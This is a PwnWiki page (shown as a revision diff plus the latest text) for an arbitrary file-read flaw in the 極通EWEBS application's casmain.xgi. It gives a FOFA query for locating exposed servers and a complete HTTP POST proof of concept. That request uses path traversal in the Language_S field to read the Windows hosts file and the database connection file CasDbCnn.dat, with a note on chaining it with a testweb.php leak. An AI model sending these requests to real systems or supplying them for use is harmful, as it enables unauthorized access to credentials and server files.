Difference between revisions of "極通EWEBS casmain.xgi 任意文件讀取漏洞"

From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== <!--T:1--> <!--T:2--> 極通EWEBS </translate> ==FOFA== <pre> app="新软科技-极通EWEBS" </pre> ==POC== <translate> 漏洞...")
 
(Marked this version for translation)
 
Line 15: Line 15:
  
 
<translate>
 
<translate>
 +
<!--T:3-->
 
漏洞請求包爲:
 
漏洞請求包爲:
 
</translate>
 
</translate>
Line 30: Line 31:
  
 
<translate>
 
<translate>
 +
<!--T:4-->
 
可以配合 testweb.php 信息泄漏讀取敏感信息
 
可以配合 testweb.php 信息泄漏讀取敏感信息
 
</translate>
 
</translate>

Latest revision as of 17:49, 18 June 2021

Other languages:

漏洞影響

極通EWEBS

FOFA

app="新软科技-极通EWEBS"

POC

漏洞請求包爲:

POST /casmain.xgi HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: PHPSESSID=923b86fa90ce1e14c82d4e36d1adc528; CookieLanguageName=ZH-CN
Content-Length: 57

Language_S=../../../../windows/system32/drivers/etc/hosts

可以配合 testweb.php 信息泄漏讀取敏感信息

Language_S=../../Data/CONFIG/CasDbCnn.dat